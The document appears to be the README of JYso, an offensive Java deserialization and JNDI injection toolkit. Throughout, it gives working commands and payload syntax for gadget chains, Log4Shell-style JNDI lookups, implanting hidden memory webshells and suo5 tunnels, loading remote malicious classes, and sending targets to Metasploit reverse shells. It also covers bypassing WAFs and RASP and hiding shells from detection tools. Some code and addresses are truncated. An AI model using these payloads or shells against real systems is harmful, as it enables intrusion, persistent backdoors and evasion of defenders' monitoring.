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1.1 启动服务

Gadget is not case sensitive

Two injection methods:

  • Supports reference to remote class loading mode (Basic routing)
    • Oracle JDK 11.0.1, 8u191, 7u201, and 6u211 and later versions, in order to limit the JNDI utilization of the LDAP protocol, the default value of the system property com.sun.jndi.ldap.object.trustURLCodebase is set to false, that is, it is not enabled by default. Allow LDAP to load objectfactory classes from remote addresses
  • Support local factory class loading mode (TomcatBypass routing)
    • The forceString option has been removed as a security enhancement measure after 9.0.63
    • tomcat-embed-core || tomcat-catalina <= 9.0.62 (Spring Boot Starter Tomcat <= 2.6.7) available
  • GroovyBypass routing
    • Construct command execution through groovy.lang.GroovyShell
  • WebsphereBypass routing
    • Loading through the constructor
  • TomcatJdbc routing
    • optional factoryType
      • org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory
      • org.apache.tomcat.dbcp.dbcp.BasicDataSourceFactory
      • org.apache.commons.dbcp2.BasicDataSourceFactory
      • org.apache.commons.dbcp.BasicDataSourceFactory
      • org.apache.tomcat.jdbc.pool.DataSourceFactory

Use java -jar JYso-[version].jar -j -h to view parameter descriptions, where the ```--ip`` parameter is a required parameter

Usage: java -jar JYso-[version].jar -j [options]
  * -i,  --ip       Local ip address  (default:
    -rP, --rmiPort  rmi bind port (default: 1099)
    -lP, --ldapPort Ldap bind port (default: 1389)
    -hP, --httpPort Http bind port (default: 3456)
    -g,  --gadgets  Show gadgets (default: false)
    -c,  --command  RMI this command
    -h,  --help     Show this help
    -ak  --AESkey   AES+BAse64 decryption of routes
    -u   --user     ldap bound account
    -p   --PASSWD   ldap binding password
    -j   --jndi     start JNDImode
  • General startup example
java -jar JYso-[version].jar -j -i
  • When account and password authentication is required
java -jar JYso-[version].jar -j -i -u "dc=ex" -p "123456"
  • For very long requests like BCEL, you can get parameters from http to reduce the request length.

Send http request parameters first, then send jndi payload


  • For route encryption anti-tracing, AESkey needs to be added when starting
java -jar JYso-2.6.jar -j -i -ak 3yWm2mOpXudIPTqM

JAVA code used for encryption
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

public class Main {
    private static final String ALGORITHM      = "AES";
    private static final String TRANSFORMATION = "AES/CBC/PKCS5Padding";
    private static final int    KEY_SIZE       = 16; // 128 bits

    public static String encodeBase64(String text) {
        byte[] encodedBytes = Base64.getEncoder().encode(text.getBytes());
        return new String(encodedBytes);

    public static String encrypt(String plaintext, String key) throws Exception {
        byte[] ivBytes  = generateIV();
        byte[] keyBytes = getKeyBytes(key);

        SecretKeySpec   secretKeySpec = new SecretKeySpec(keyBytes, ALGORITHM);
        IvParameterSpec ivSpec        = new IvParameterSpec(ivBytes);

        Cipher cipher = Cipher.getInstance(TRANSFORMATION);
        cipher.init(Cipher.ENCRYPT_MODE, secretKeySpec, ivSpec);

        byte[] encryptedBytes = cipher.doFinal(plaintext.getBytes(StandardCharsets.UTF_8));
        byte[] combinedBytes  = new byte[ivBytes.length + encryptedBytes.length];
        System.arraycopy(ivBytes, 0, combinedBytes, 0, ivBytes.length);
        System.arraycopy(encryptedBytes, 0, combinedBytes, ivBytes.length, encryptedBytes.length);

        return Base64.getEncoder().encodeToString(combinedBytes);

    private static byte[] generateIV() {
        byte[] ivBytes = new byte[KEY_SIZE];
        // Generate random IV bytes
        // Replace with a secure random generator if possible
        for (int i = 0; i < ivBytes.length; i++) {
            ivBytes[i] = (byte) (Math.random() * 256);
        return ivBytes;

    private static byte[] getKeyBytes(String key) {
        byte[] keyBytes      = new byte[KEY_SIZE];
        byte[] passwordBytes = key.getBytes(StandardCharsets.UTF_8);
        System.arraycopy(passwordBytes, 0, keyBytes, 0, Math.min(passwordBytes.length, keyBytes.length));
        return keyBytes;
    public static void main(String[] args) {
        try {
            String plaintext = "Deserialization/CommonsCollections6/command/Base64/d2hvYW1p";
            String key = "3yWm2mOpXudIPTqM";

            String ciphertext = encrypt(plaintext, key);
            String encodedText = encodeBase64(ciphertext);
            System.out.println("Base64 Encoded Text: " + encodedText);
        } catch (Exception e) {
  • For situations where routing is completely uncontrollable, obtain it from http

1.2 Echo use

  • Command AllEcho: DFS finds Request command execution echo
  • Command TomcatEcho: Tomcat command execution echo
  • Command SpringEcho: Spring command execution echo
  • Command JbossEcho: Jboss command execution echo
  • Command jettyEcho: Jetty command execution echo
  • Command LinuxEcho1: Linux command execution echo
  • Command LinuxEcho2: Linux command execution echo
  • Command resinEcho: Resin command execution echo
  • Command weblogicEcho: Weblogic command execution echo
  • Command WindowsEcho: Windows command execution echo
  • Command ResinEcho: Resin command execution echo
  • Command WebsphereEcho: websphere command execution echo

The echo of the Echo class is based on finding the request with the specified Header header in the thread group, executing the command and echoing it.

When using, add X-Token-Data to the Header, its value is the command to be executed, and the command execution result will be echoed in the response.

  • JNDI-Injection-Exploit usage:
  • When no parameters are required
  • When parameters are required
${jndi:ldap:// Cookiess}
  • ysoserial
java -jar JYso-[version].jar -y -g [Gadget] -p "EX-TomcatEcho" 


  • Support tomcatBypass routing to directly go online to msf:
  • Use msf's java/meterpreter/reverse_tcp to enable monitoring

1.3 Memory horse

To solve the problem of Shiro Header being too long:

  • Command EX-DefineClassFromParameter: Get the value of the specified parameter from request for class loading

Memory horse:

  • Command MS-SpringInterceptorMS-...: Implant a Spring interceptor type memory horse into the system
  • Command MS-SpringControllerMS-...: Implant a Spring Controller type memory horse into the system
  • Command MS-SpringWebfluxMS-...: Implant a Spring WebFilter type memory horse into the system (only supports gz and cmd)
  • Command MS-TSMSFromJMXF: Use JMX MBeans to implant Tomcat Filter type memory horse into the system
  • Command MS-TSMSFromJMXS-...: Use JMX MBeans to implant Tomcat Servlet type memory horse into the system
  • Command MS-TLMSFromJMXLi-...: Use JMX MBeans to implant Tomcat Listener type memory horse into the system
  • Command MS-JFMSFromJMXF-...: Use JMX MBeans to implant Jetty Filter type memory horse into the system
  • Command MS-JFMSFromJMXS-...: Use JMX MBeans to implant Jetty Servlet type memory horse into the system
  • Command MS-TFMSFromRequestF-...: Inject Tomcat Filter type memory horse into the system by finding Request in the thread group
  • Command MS-TFMSFromRequestS-...: Inject Tomcat Servlet type memory horse into the system by finding Request in the thread group
  • Command MS-TFMSFromThreadF-...: Obtain the specified context through the thread class loader and implant the Tomcat Filter type memory horse into the system
  • Command MS-TFMSFromThreadLi-...: Obtain the specified context through the thread class loader and implant the Tomcat Listener type memory horse into the system
  • Command MS-TFMSFromThreadS-...: Obtain the specified context through the thread class loader and implant the Tomcat Servlet type memory horse into the system
  • Command MS-JBFMSFromContextF-...: implant JBoss/Wildfly Filter type memory horse into the system through global context
  • Command MS-JBFMSFromContextS-...: Inject JBoss/Wildfly Servlet type memory horse into the system through global context
  • Command MS-RFMSFromThreadF-...: Obtain the specified context through the thread class loader and implant the Resin Filter type memory horse into the system
  • Command MS-RFMSFromThreadS-...: Obtain the specified context through the thread class loader and implant the Resin Servlet type memory horse into the system
  • Command MS-WSFMSFromThread-...: Obtain the Websphere Filter type memory horse implanted in the specified context system through the thread class loader
  • JNDI-Injection-Exploit usage:
    • Additional parameters can be added after the shell, which requires base64 encoding. See 1.5 for details.
ldap://[Basic or TomcatBypass]/[M-MS-MemShellClass-...]/shell/base64params

For TomcatJdbc routing:


For TomcatBypass routing Basic routing:


In case of RMI

  • ysoserial
java -jar JYso-[version].jar -y -g [Gadget] -p "[E-EX-MS-MemShellClass]"
  • cmsMSBYNC: WebSocket horse that bypasses Nginx and CDN proxy restrictions, path /x
  • proxyMSBYNC: WebSocket horse that bypasses Nginx and CDN proxy restrictions, path /x
  • WsResin: WebSocket horse adapted to Resin, Upgrade: websocket in the request header
  • MsTSJser: WebSocket horse adapted for Tomcat, Spring, and Jetty, path /cmd
  • MsTSJproxy: WebSocket horse adapted for Tomcat, Spring, and Jetty, path /proxy
  • WsWeblogic: WebSocket horse adapted to Weblogic, path /path
  • WSWebsphereProxy: WebSocket horse adapted to Websphere, path /path
  • JNDI-Injection-Exploit usage:
ldap://[Basic or TomcatBypass]/[E-EX-MemShellClass]
  • ysoserial
java -jar JYso-[version].jar -y -g [Gadget] -p "[E-EX-MemShellClass]" 

1.3.1 Command execution and backdoor categories

For the implanted memory horse and malicious logic, first of all, in order to hide the memory horse, it is judged through logic. It is necessary to add Referer: to the request header, and secondly, different logic is executed: The header and value of this verification can be customized and specified through -hk "Referer" -hv "".

  1. If it is a CMD memory horse, the program will read the command to be executed from X-Token-Data and echo the execution result. This header can Specified by -ch "testecho".

  2. If it is Ice Scorpion Shell memory horse, you can use the Ice Scorpion client for connection management. The password p@ssw0rd can be passed -pw "1qaz@WSX" to specify.

  3. If it is a Godzilla shell memory horse, you can use the Godzilla client for connection management. The pass value is set to p@ssw0rd and the key is set to key , Godzilla memory horse supports both RAW and Base64, which can be specified through -pw "1qaz@WSX" -gzk "evilkey".

  4. If it is a suo5 memory horse, a suo5 tunnel will be created directly, which can be connected directly by the suo5 client. suo5 currently supports authentication of custom headers. Right, you can specify it through the parameters -hk "User-Agent" -hv "aaaawww" when generating. You can connect normally as follows:

    Configure in configuration.

    Project address: This project is still being actively updated, and relevant codes will be updated from time to time to support related functions.

  5. If it is a WebSocket memory horse, you can use the WebSocket client to link. The path is /version.txt, and you can use -u "/aaa" to specify.

  6. If it is a Tomcat Executor memory horse, the program will read the command to be executed from X-Token-Data in the Header and store the execution result in the Header Server -token performs Base64encode echo and can be specified using -ch "testecho".

  7. If it is Tomcat Upgrade memory horse, you need to specify Connection: Upgrade and Upgrade: version.txt, and the program will get the X-Token-Data in the Header Read the command to be executed and put the result back into the response for echo. You can use -u "/aaa" -ch "testecho" to specify.

1.3.2 RMI memory horse

For RMIBindTemplate It starts the registration center on the specified port on the target server (if not), and binds the malicious backdoor class to it, in conjunction with Perform command execution

Currently supported types of direct memory horses include Tomcat, Jetty, JBoss/Wildfly, Websphere, Resin, and Spring.

And you can specify the type of memory horse through keywords, such as Ice Scorpion memory horse, Godzilla Base64 memory horse, Godzilla RAW memory horse, CMD command echo horse, etc. The usage examples are as follows:

  • EX-MS-TSMSFromThread-bx: Ice Scorpion logical memory horse
  • EX-MS-TSMSFromThread-gz: Godzilla Base64 logical memory horse
  • EX-MS-TSMSFromThread-gzraw: Godzilla RAW logical memory horse
  • EX-MS-TSMSFromThread-cmd: CMD command echoes memory horse
  • EX-MS-TSMSFromThread-suo5: suo5 suo5 tunnel horse

In addition, this project currently supports Tocmat WebSocket, Upgrade and Executor command execution memory horses. It has not been expanded to multiple types yet (because the relevant tools do not support it and need to be modified). Examples of usage are as follows:

  • EX-MS-TWSMSFromThread: CMD command echoes WebSocket memory horse
  • EX-MS-TEXMSFromThread: CMD command echoes Executor memory horse
  • EX-MS-TUGMSFromJMXuP: CMD command echoes Upgrade memory horse

For some unconventional environments, this project also provides a native Java-based RMI memory horse and command echo method. By binding a malicious class to the RMI registration center, the execution command can be called and echoed at any time. Examples of usage are as follows:

  • EX-MS-RMIBindTemplate-1100-qi4l: CMD command echoes RMI memory horse

Agent-type memory horse without file landing, by modifying the system key class bytecode, implanting the memory horse, without any file landing, the whole process is operated in the memory, and can bypass a variety of protection and detection, use method EX-Agent-Lin /Win-Filter/Servlet-bx/gzraw/gz/cmd, currently distinguishes Win/Lin operating systems, and supports Servlet and Tomcat Filter type memory horses. Some Hook points will be continuously updated. For example, the usage method is:

  • EX-Agent-Lin-Filter-bx: Ice Scorpion Agent-type memory horse that modifies Tomcat Filter-like bytecode on Linux systems

All memory horses supported by this tool have been tested and available, but are actually limited by the middleware version. For related tests of memory horses, you can refer to the project [](https://github. com/su18/MemoryShell)

1.4 SignedObject secondary deserialization Gadget

Used to bypass certain scenarios (common ones such as TemplatesImpl blacklist, CC numerous groups and blacklists that often appear in CTF, etc.)

The utilization chain needs to call the getObject method of SignedObject, so it needs a trigger point that can call any method or call the getter method of the specified class;

It probably includes the following common call chains available:

  1. InvokerTransformer calls any method (depends on CC)
  2. BeanComparator calls the getter method (depends on CB)
  3. BasicPropertyAccessor$BasicGetter calls the getter method (depends on Hibernate)
  4. ToStringBean calls all getter methods (depends on Rome)
  5. MethodInvokeTypeProvider reflects to call any method (depends on spring-core)
  6. MemberBox reflects to call any method (depends on rhino)
  • cc, cc4, cb, hibernate, rome, rhino, spring

  • How to use:

  • SignedObjectPayload -> 'CC:CommonsCollections6:b3BlbiAtYSBDYWxjdWxhdG9yLmFwcA==:1:10000' The last two parameters are the deserialized types

  • JNDI-Injection-Exploit usage:
  • ysoserial
java -jar JYso-[version].jar -y -g [Gadget] -p "CC:CommonsCollections6:b3BlbiAtYSBDYWxjdWxhdG9yLmFwcA==:1:10000" 

1.5 Gadget

[root]#~  Usage: java -jar JYso-[version].jar -y -g [payload] -p [command] [options]
[root]#~  Available payload types:
     Payload                                     Authors                                Dependencies                                                                                                                                                                        
     -------                                     -------                                ------------                                                                                                                                                                        
     AspectJWeaver                               @Jang                                  aspectjweaver:1.9.2, commons-collections:3.2.2                                                                                                                                
     AspectJWeaver2                              @QI4L                                  aspectjweaver:1.9.2, commons-collections:3.2.2                                                                                                                                    
     BeanShell1                                  @pwntester, @cschneider4711            bsh:2.0b5
     BeanShell2                                  @killer                                bsh:2.0b1                                                                                                                                                                         
     C3P0                                        @mbechler                              c3p0:, mchange-commons-java:0.2.11                                                                                                                                          
     C3P02                                       @QI4L                                  c3p0:, mchange-commons-java:0.2.11, tomcat:8.5.35                                                                                                           
     C3P03                                       @QI4L                                  c3p0:, mchange-commons-java:0.2.11, tomcat:8.5.35, groovy:2.3.9                                                                                                              
     C3P04                                       @QI4L                                  c3p0:, mchange-commons-java:0.2.11, tomcat:8.5.35, snakeyaml:1.30                                                                                                            
     C3P092                                      @mbechler                              c3p0:0.9.2-pre2-RELEASE ~ 0.9.5-pre8, mchange-commons-java:0.2.11                                                                                                                   
     Click1                                      @artsploit                             click-nodeps:2.3.0, javax.servlet-api:3.1.0                                                                                                                                         
     Clojure                                     @JackOfMostTrades                      clojure:1.8.0                                                                                                                                                                       
     CommonsBeanutils1                           @frohoff                               commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2                                                                                                               
     CommonsBeanutils1183NOCC                    @QI4L                                  commons-beanutils:1.8.3                                                                                                                                                             
     CommonsBeanutils1JDBC                       @QI4L                                  commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2                                                                                                               
     CommonsBeanutils2                           @CCKUAILONG                            commons-beanutils:1.9.2                                                                                                                                                             
     CommonsBeanutils2JDBC                       @QI4L                                  commons-beanutils:1.9.2  
     CommonsBeanutils5                                                                  commons-beanutils:1.6.1                                                                                         
     CommonsBeanutils2NOCC                                                              commons-beanutils:1.8.3, commons-logging:1.2                                                                                                                                        
     CommonsBeanutilsAttrCompare                 @水滴                                   commons-beanutils:1.9.2                                                                                                                                                           
     CommonsBeanutilsAttrCompare183              @SummerSec                             commons-beanutils:1.8.3                                                                                                                                                             
     CommonsBeanutilsObjectToStringComparator    @水滴                                   commons-beanutils:1.9.2, commons-lang3:3.10                                                                                                                                       
     CommonsBeanutilsObjectToStringComparator183 @SummerSec                             commons-beanutils:1.8.3, commons-lang3:3.10                                                                                                                                         
     CommonsBeanutilsPropertySource              @SummerSec                             commons-beanutils:1.9.2, log4j-core:2.17.1                                                                                                                                          
     CommonsBeanutilsPropertySource183           @SummerSec                             commons-beanutils:1.9.2, log4j-core:2.17.1                                                                                                                                          
     CommonsCollections1                         @frohoff                               commons-collections:3.1                                                                                                                                                             
     CommonsCollections10                                                               commons-collections:3.2.1                                                                                                                                                           
     CommonsCollections12                                                               commons-collections:3.2.1                                                                                                                                                           
     CommonsCollections2                         @frohoff                               commons-collections4:4.0                                                                                                                                                            
     CommonsCollections3                         @frohoff                               commons-collections:3.1                                                                                                                                                             
     CommonsCollections4                         @frohoff                               commons-collections4:4.0                                                                                                                                                            
     CommonsCollections5                         @matthias_kaiser, @jasinner            commons-collections:3.1                                                                                                                                                             
     CommonsCollections6                         @matthias_kaiser                       commons-collections:3.1                                                                                                                                                             
     CommonsCollections7                         @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1                                                                                                                                                             
     CommonsCollections8                         @navalorenzo                           commons-collections4:4.0                                                                                                                                                            
     CommonsCollections9                         @梅子酒                                 commons-collections:3.2.1                                                                                                                                                        
     CommonsCollectionsK1                                                               commons-collections:3.1                                                                                                                                                                                                                                                                                                                                                
     CommonsCollectionsK2                                                               commons-collections:4.0                                                                                                                                                             
     CommonsCollectionsK3                        @matthias_kaiser                       commons-collections:3.1                                                                                                                                                             
     CommonsCollectionsK4                        @matthias_kaiser                       commons-collections:4.0                                                                                                                                                             
     CommonsCollectionsK5                        @QI4L                                  commons-collections:4.0                                                                                                                                                             
     CommonsCollectionsK6                        @QI4L                                  commons-collections:4.0                                                                                                                                                             
     Groovy1                                     @frohoff                               groovy:2.3.9                                                                                                                                                                        
     Hibernate1                                  @mbechler                              hibernate-core:4.3.11.Final, aopalliance:1.0, jboss-logging:3.3.0.Final, javax.transaction-api:1.2, dom4j:1.6.1                                                                     
     Hibernate2                                  @mbechler                              hibernate-core:4.3.11.Final, aopalliance:1.0, jboss-logging:3.3.0.Final, javax.transaction-api:1.2, dom4j:1.6.1                                                                     
     JBossInterceptors1                          @matthias_kaiser                       javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21                            
     JRE8u20                                     @frohoff                                                                                                                                                                                                                   
     JRMPClient                                  @mbechler                                                                                                                                                                                                                  
     JRMPClient_Activator                        @mbechler                                                                                                                                                                                                                  
     JRMPClient_Obj                              @mbechler                                                                                                                                                                                                                  
     JRMPListener                                @mbechler                                                                                                                                                                                                                  
     JSON1                                       @mbechler                              json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
     JavassistWeld1                              @matthias_kaiser                       javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21                                        
     Jdk7u21                                     @frohoff                                                                                                                                                                                                                   
     Jdk7u21variant                              @potats0                                                                                                                                                                                                                   
     Jython1                                     @pwntester, @cschneider4711            jython-standalone:2.5.2                                                                                                                                                             
     MozillaRhino1                               @matthias_kaiser                       js:1.7R2                                                                                                                                                                            
     MozillaRhino2                               @_tint0                                js:1.7R2                                                                                                                                                                            
     Myfaces1                                    @mbechler                                                                                                                                                                                                                  
     ROME                                        @mbechler                              rome:1.0                                                                                                                                                                            
     ROME2                                                                              rome:1.0                                                                                                                                                                            
     RenderedImage                                                                      jai-codec-1.1.3                                                                                                                                                                     
     Spring1                                     @frohoff                               spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE                                                                                                                               
     Spring2                                     @mbechler                              spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2                                                                                           
     Spring3                                                                            spring-tx:5.2.3.RELEASE, spring-context:5.2.3.RELEASE, javax.transaction-api:1.2                                                                                                    
     URLDNS                                      @gebl                                                                                                                                                                                                                      
     Vaadin1                                     @kai_ullrich                           vaadin-server:7.7.14, vaadin-shared:7.7.14                                                                                                                                          
     Wicket1                                     @jacob-baines                          wicket-util:6.23.0, slf4j-api:1.6.4                                                                                                                                                 

usage: JYso-[version].jar [-ch <arg>] [-dcfp <arg>] [-dl <arg>] [-dt <arg>] [-f <arg>] [-g <arg>] [-gen] [-gzk <arg>] [-h] [-hk <arg>] [-ht <arg>] [-hv <arg>] [-i] [-mcl] [-n <arg>] [-ncs] [-o] [-p
       <arg>] [-pw <arg>] [-rh] [-u <arg>] [-yso <arg>]
 -ch,--cmd-header <arg>                      Request Header which pass the command to Execute,default [X-Token-Data]
 -dcfp,--define-class-from-parameter <arg>   Customize parameter name when using DefineClassFromParameter
 -dl,--dirty-length <arg>                    Length of dirty data when using type 1 or 3/Counts of Nesting loops when using type 2
 -dt,--dirty-type <arg>                      Using dirty data to bypass WAF,type: 1:Random Hashable Collections/2:LinkedList
                                             Nesting/3:TC_RESET in Serialized Data
 -f,--file <arg>                             Write Output into FileOutputStream (Specified FileName)
 -g,--gadget <arg>                           Java deserialization gadget
 -gen,--gen-mem-shell                        Write Memory Shell Class to File
 -gzk,--godzilla-key <arg>                   Godzilla key,default [key]
 -h,--hide-mem-shell                         Hide memory shell from detection tools (type 2 only support SpringControllerMS)
 -hk,--header-key <arg>                      MemoryShell Header Check,Request Header Key,default [Referer]
 -ht,--hide-type <arg>                       Hide memory shell,type 1:write /jre/lib/charsets.jar 2:write /jre/classes/
 -hv,--header-value <arg>                    MemoryShell Header Check,Request Header Value,default []
 -i,--inherit                                Make payload inherit AbstractTranslet or not (Lower JDK like 1.6 should inherit)
 -mcl,--mozilla-class-loader                 Using org.mozilla.javascript.DefiningClassLoader in TransformerUtil
 -n,--gen-mem-shell-name <arg>               Memory Shell Class File Name
 -ncs,--no-com-sun                           Force Using org.apache.XXX.TemplatesImpl instead of
 -o,--obscure                                Using reflection to bypass RASP
 -p,--parameters <arg>                       Gadget parameters
 -pw,--password <arg>                        Behinder or Godzilla password,default [p@ssw0rd]
 -rh,--rhino                                 ScriptEngineManager Using Rhino Engine to eval JS
 -u,--url <arg>                              MemoryShell binding url pattern,default [/version.txt]
 -utf,--utf8-Overlong-Encoding               UTF-8 Overlong Encoding Bypass waf
 -y,--ysoserial                              Java deserialization

Recommended Usage: -y -g [payload] -p '[command]' -dt 1 -dl 50000 -o -i -f evil.ser
If you want your payload being extremely short,you could just use:
java -jar JYso-[version].jar -y -g [payload] -p '[command]' -i -f evil.ser

1.5.1 for TemplatesImpl

The original version only used the Runtime command execution method, but here it is deeply expanded and a variety of memory horse functions are implanted.

1.5.2 For ChainedTransformer

  • CommonsCollections1
  • CommonsCollections5
  • CommonsCollections6
  • CommonsCollections7
  • CommonsCollections9
  • CommonsCollectionsK3
  • CommonsCollectionsK4
  • commonscollectionsK5

This project expands its utilization methods in addition to Runtime execution commands, as follows:

  • TS: Thread Sleep - Check whether there is a deserialization vulnerability through Thread.sleep(), use the command: TS-10
  • RC: Remote Call - Call and initialize the remote malicious class through URLClassLoader.loadClass(), use the command: RC-
  • WF: Write File - Write the file through FileOutputStream.write(), use the command: WF-/tmp/shell#d2hvYW1p
  • PB: ProcessBuilder uses ProcessBuilder.start() to execute system commands. Use the commands PB-lin-d2hvYW1p / PB-win-d2hvYW1p to execute commands on different operating systems respectively.
  • SE: ScriptEngine - Use ScriptEngineManager.getEngineByName('js').eval() to parse JS code and call Runtime execution command, use command SE-d2hvYW1
  • DL: DNS LOG - Trigger DNS resolution through InetAddress.getAllByName(), use the command
  • HL: HTTP LOG - Trigger HTTP LOG through URL.getContent(), use the command HL-
  • BC: BCEL Classloader - Load BCEL class bytecode through ..bcel...ClassLoader.loadClass().newInstance(), use the command BC-$BCEL$xxx, you can also use BC-EX -TomcatEcho or BC-LF-/tmp/aaa.class to perform advanced functions
  • JD: JNDI Lookup - Trigger JNDI injection through InitialContext.lookup(), use the command JD-ldap://xxx/xx
  • Others: normal command execution - execute system commands through Runtime.getRuntime().exec(), use the command whoami

What needs to be noted here is that when using PB to execute system commands, WF to write the contents of files, and SE to execute commands, in order to prevent parameter passing errors, you need to use on the incoming commands. base64 encoding.

In addition to the above utilization, the project also supports the EX- writing method through ScriptEngineManager to execute JS, which means that the ChainedTransformer utilization method can also be entered into the memory or echoed.

Command execution example:

Same as in JNDI


Command execution example:

java -jar JYso-[version].jar -y -g CommonsCollections1 -p PB-lin-b3BlbiAtYSBDYWxjdWxhdG9yLmFwcA==

DNSLOG example:

java -jar JYso-[version].jar -y -g CommonsCollections1 -p ''

Script engine parsing JS code example:

java -jar JYso-[version].jar -y -g CommonsCollections1 -p 'SE-b3BlbiAtYSBDYWxjdWxhdG9yLmFwcA=='

File writing example:

java -jar JYso-[version].jar -y -g CommonsCollections1 -p 'WF-/tmp/1.jsp#PCVAcGFnZSBwYWdlR.....'

Trigger JNDI query injection example:

java -jar JYso-[version].jar -y -g CommonsCollections1 -p 'JD-ldap://'

Normal command execution example:

java -jar JYso-[version].jar -y -g CommonsCollections1 -p 'open -a'

For more usage, please see the specific comments in the corresponding code of the chain.

1.6 Any custom code

If you do not want to use the malicious logic provided in this project or execute commands, you can use custom code. The custom code will pass ClassLoader on the target server. And uses bytecode shortening technology to reduce Payload size


java -jar JYso-[version].jar -y -g CommonsCollections3 -p LF-/tmp/evil.class

1.7 URLDNS detection target class

In order to solve the situation where there is a deserialization utilization point but no link is available, this project provides the function of detecting target classes based on URLDNS. This chain will determine the system environment and dependency versions based on whether different classes exist in the target environment. It mainly includes the content in the following table:

DNSLOG keyword gadget class 备注
CommonsCollections13567 org.apache.commons.collections.functors.ChainedTransformer
CommonsCollections24 org.apache.commons.collections4.functors.ChainedTransformer
CommonsBeanutils2 org.apache.commons.beanutils.MappedPropertyDescriptor$1
C3P0 com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase
ajw AspectJWeaver AspectJWeaver,需要cc31
bsh bsh.CollectionManager$1
Groovy org.codehaus.groovy.reflection.ClassInfo$ClassInfoSet
becl Becl JDK<8u251
Jdk7u21 Jdk7u21 JDK<=7u21
JRE8u20 JRE8u20 javax.swing.plaf.metal.MetalFileChooserUI$DirectoryComboBoxModel$1 7u25<=JDK<=8u20
winlinux sun.awt.X11.AwtGraphicsConfigData
jackson2100 jackson com.fasterxml.jackson.databind.node.NodeSerialization
ROME ROME com.sun.syndication.feed.impl.ToStringBean
SpringAOP fastjon
fastjson fastjon
all 全部检测

This project refers to master kezibei’s URLDNS project. In actual situations, the following situations may cause problems:

  • If a blacklist is encountered during deserialization, the dnslog of subsequent classes may not be released;
  • During the deserialization process, errors may be reported due to various circumstances, resulting in failure to exit.

Therefore, three detection methods of all/common/specified classes are still provided:

  • all: detect all classes;
  • common: detect CommonsBeanutils2/C3P0/AspectJWeaver/bsh/winlinux that are not often in the blacklist;
  • Specify the class: use the keyword CommonsCollections24:xxxx.dns.log in the corresponding chain.

Example: all:xxx.dns.log

Base64 encode all:dnslog address, that’s it

java -jar JYso-[version].jar -y -g URLDNS -p 'all:xxx.dns.log'

1.8 Expansion of other utilization chains

For BeanShell1 and Clojure, two exploit methods based on script language parsing.

This project expands a variety of utilization methods for these two utilization chains in addition to Runtime execution commands, as follows:

  • TS: Thread Sleep - Check whether there is a deserialization vulnerability through Thread.sleep(), use the command: TS-10
  • RC: Remote Call - Call and initialize the remote malicious class through URLClassLoader.loadClass(), use the command: RC-
  • WF: Write File - Write the file through FileOutputStream.write(), use the command: WF-/tmp/shell#123
  • Others: normal command execution - execute system commands through ProcessBuilder().start(), use the command whoami

Similar to the previous extension, screenshots are not included here.

For BeanShell1, it also supports echoing or memory horse entry by executing JS through ScriptEngineManager. The usage is the same as above: EX-

1.9 Traffic level

For Ice Scorpion and Godzilla, they have many features that can be extracted in the traffic and Java layers. There is no way to control them here. You need to modify them by yourself. In fact, it is not difficult. This project removes some similar features that everyone has implemented.

In some cases, the WAF at the traffic layer will match keywords and key features when parsing traffic packets, such as deserializing the package names and class names of some key classes that appear in the traffic packets, but the traffic equipment is limited. Due to performance impact, request packets will not be parsed unlimitedly, which may affect actual business, so there will generally be a "time" for parsing. A threshold on length above which the check will be abandoned.

Therefore, this project has added the function of adding dirty data to deserialized data to bypass the WAF at the traffic level. When generating deserialized data, specify the -dt parameter to generate encapsulated data with random dirty data according to different types. Deserialized packet of characters.

For example:

java -jar JYso-[version].jar -y -g CommonsBeanutils1 -p 'EX-MS-TEXMSFromThread' -dt 1 -dl 50000

Can generate serialized data padded with 50,000 dirty characters

Use UTF encoding to 3-byte encryption of strong features such as TC_CLASSDESC, TC_PROXYCLASSDESC, and TC_STRING in the original serialized data.

java -jar JYso-[version].jar -y -g CommonsBeanutils1 -p 'EX-MS-TEXMSFromThread' -utf

2.0 RASP level

For Runtime, URLClassLoader, etc. that are commonly used for vulnerability execution, many RASPs have hooks, which may be intercepted during attacks. Here I used some techniques such as reflective calling native methods to try RASP The specific technical implementation of defense will not be detailed. Interested friends can decompile the jar package to view the relevant code. You can use the -o parameter to specify techniques to bypass RASP.

Dynamic generation of obfuscated class names is currently supported without any qi4l keyword.

2.1 Exploit

Except for the individual parameters, the remaining parameters are consistent with the parameters of the payload.

  • JBoss
  • JenkinsCLI
  • JenkinsListener
  • JenkinsReverse
  • JMXInvokeMBean
  • JRMPClassLoadingListener
  • JRMPClient
  • JRMPListener
  • JSF
  • RMIBindExploit
java -cp JYso-[version].jar -y com.qi4l.jndi.exploit.JRMPListener 8888 -g CommonsCollections1 -p whoami

2.2 Normal command execution

  • JNDI-Injection-Exploit usage:
${jndi:ldap://[Basic or TomcatBypass ]/command/base64/[base64cmd]}
  • ysoserial
java -jar JYso-[version].jar -y -g [Gadget] -p "calc" 

2.3 MSF/CS is online

Use MSF's online payload and remote Jar package invocation to complete MSF online, which can be transferred to CS later.